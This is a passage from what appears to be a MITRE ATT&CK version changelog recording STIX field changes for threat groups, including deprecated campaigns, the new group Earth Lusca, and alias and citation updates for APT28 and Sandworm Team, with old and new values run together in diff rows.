external_references[10]['description']Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
external_references[10]['url']https://www.secureworks.com/research/threat-profiles/iron-libertyhttps://www.us-cert.gov/ncas/alerts/TA18-074A
Deprecations

[G0132] CostaRicto

Current version: 1.0

Description: [CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 20:41:50.305000+00:002022-10-12 19:18:38.430000+00:00

[G0031] Dust Storm

Current version: 1.0

Description: [Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-03-22 20:14:29.575000+00:002022-09-29 21:28:39.974000+00:00
external_references[2]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[2]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

[G0101] Frankenstein

Current version: 1.1

Description: [Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 19:57:42.132000+00:002022-09-19 21:44:20.477000+00:00

[G0072] Honeybee

Current version: 1.1

Description: [Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-23 19:48:35.981000+00:002022-09-19 20:08:40.243000+00:00

[G0014] Night Dragon

Current version: 1.4

Description: [Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 22:12:11.717000+00:002022-09-22 20:54:08.611000+00:00

[G0116] Operation Wocao

Current version: 1.0

Description: [Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 00:14:14.838000+00:002022-10-12 19:17:31.924000+00:00
external_references[2]['url']https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdfhttps://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

[G0104] Sharpshooter

Current version: 1.0

Description: Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-30 03:08:44.808000+00:002022-09-26 22:11:36.315000+00:00

mobile-attack

New Groups

[G1006] Earth Lusca

Current version: 1.0

Description: [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)

Major Version Changes

[G0007] APT28

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 20:34:03.233000+00:002022-03-16 18:08:13.958000+00:00
external_references[2]['source_name']SNAKEMACKERELIRON TWILIGHT
external_references[2]['description'](Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[3]['source_name']SwallowtailSNAKEMACKEREL
external_references[3]['description'](Citation: Symantec APT28 Oct 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[4]['source_name']Group 74Swallowtail
external_references[4]['description'](Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)
external_references[5]['source_name']SednitGroup 74
external_references[5]['description']This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[6]['source_name']SofacySednit
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[7]['source_name']Pawn StormSofacy
external_references[7]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[8]['source_name']Fancy BearPawn Storm
external_references[8]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[9]['source_name']STRONTIUMFancy Bear
external_references[9]['description'](Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[10]['source_name']Tsar TeamSTRONTIUM
external_references[10]['description'](Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[11]['source_name']Threat Group-4127Tsar Team
external_references[11]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name']TG-4127Threat Group-4127
external_references[13]['source_name']NSA/FBI Drovorub August 2020TG-4127
external_references[13]['description']NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.(Citation: SecureWorks TG-4127)
external_references[14]['source_name']Cybersecurity Advisory GRU Brute Force Campaign July 2021NSA/FBI Drovorub August 2020
external_references[14]['description']NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[14]['url']https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDFhttps://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[15]['source_name']DOJ GRU Indictment Jul 2018Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[15]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[15]['url']https://www.justice.gov/file/1080281/downloadhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[16]['source_name']Ars Technica GRU indictment Jul 2018DOJ GRU Indictment Jul 2018
external_references[16]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[16]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/https://www.justice.gov/file/1080281/download
external_references[17]['source_name']Crowdstrike DNC June 2016Ars Technica GRU indictment Jul 2018
external_references[17]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[17]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[18]['source_name']FireEye APT28Crowdstrike DNC June 2016
external_references[18]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[18]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[19]['source_name']SecureWorks TG-4127FireEye APT28
external_references[19]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[19]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[20]['source_name']FireEye APT28 January 2017SecureWorks TG-4127
external_references[20]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[20]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[21]['source_name']GRIZZLY STEPPE JARFireEye APT28 January 2017
external_references[21]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[21]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[22]['source_name']Sofacy DealersChoiceGRIZZLY STEPPE JAR
external_references[22]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[22]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[23]['source_name']Palo Alto Sofacy 06-2018Sofacy DealersChoice
external_references[23]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[23]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[24]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[24]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[24]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[25]['source_name']ESET Zebrocy May 2019Symantec APT28 Oct 2018
external_references[25]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[25]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[26]['source_name']US District Court Indictment GRU Oct 2018ESET Zebrocy May 2019
external_references[26]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[26]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[27]['source_name']Kaspersky SofacyUS District Court Indictment GRU Oct 2018
external_references[27]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[27]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://www.justice.gov/opa/page/file/1098481/download
external_references[28]['source_name']ESET Sednit Part 3Kaspersky Sofacy
external_references[28]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[28]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[29]['source_name']Talos Seduploader Oct 2017ESET Sednit Part 3
external_references[29]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[29]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttp://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[30]['source_name']Securelist Sofacy Feb 2018Talos Seduploader Oct 2017
external_references[30]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[30]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[31]['source_name']Accenture SNAKEMACKEREL Nov 2018Securelist Sofacy Feb 2018
external_references[31]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[31]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[32]['source_name']TrendMicro Pawn Storm Dec 2020Secureworks IRON TWILIGHT Profile
external_references[32]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[32]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.secureworks.com/research/threat-profiles/iron-twilight
external_references[33]['source_name']Microsoft STRONTIUM Aug 2019Secureworks IRON TWILIGHT Active Measures March 2017
external_references[33]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.
external_references[33]['url']https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/https://www.secureworks.com/research/iron-twilight-supports-active-measures
external_references[34]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Accenture SNAKEMACKEREL Nov 2018
external_references[34]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[34]['url']https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
x_mitre_version3.24.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRON TWILIGHT
external_references{'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'}
external_references{'source_name': 'Microsoft STRONTIUM Aug 2019', 'description': 'MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.', 'url': 'https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/'}
external_references{'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'}
Minor Version Changes

[G0034] Sandworm Team

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 21:46:19.437000+00:002022-10-12 20:11:40.313000+00:00
aliases[6]VOODOO BEARVoodoo Bear
external_references[1]['source_name']Sandworm TeamVoodoo Bear
external_references[1]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[3]['source_name']TelebotsSandworm Team
external_references[3]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[4]['source_name']IRON VIKINGQuedagh
external_references[4]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[6]['source_name']QuedaghTelebots
external_references[6]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']VOODOO BEARIRON VIKING
external_references[7]['description'](Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Unit 74455 October 2020US District Court Indictment GRU Oct 2018
external_references[8]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[8]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.justice.gov/opa/page/file/1098481/download
external_references[9]['source_name']UK NCSC Olympic Attacks October 2020Dragos ELECTRUM
external_references[9]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[9]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.dragos.com/resource/electrum/
external_references[10]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[10]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[10]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[11]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[11]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[12]['source_name']USDOJ Sandworm Feb 2020CrowdStrike VOODOO BEAR
external_references[12]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[12]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[13]['source_name']NCSC Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[13]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[13]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[14]['source_name']US District Court Indictment GRU Oct 2018NCSC Sandworm Feb 2020
external_references[14]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[14]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[15]['source_name']F-Secure BlackEnergy 2014USDOJ Sandworm Feb 2020
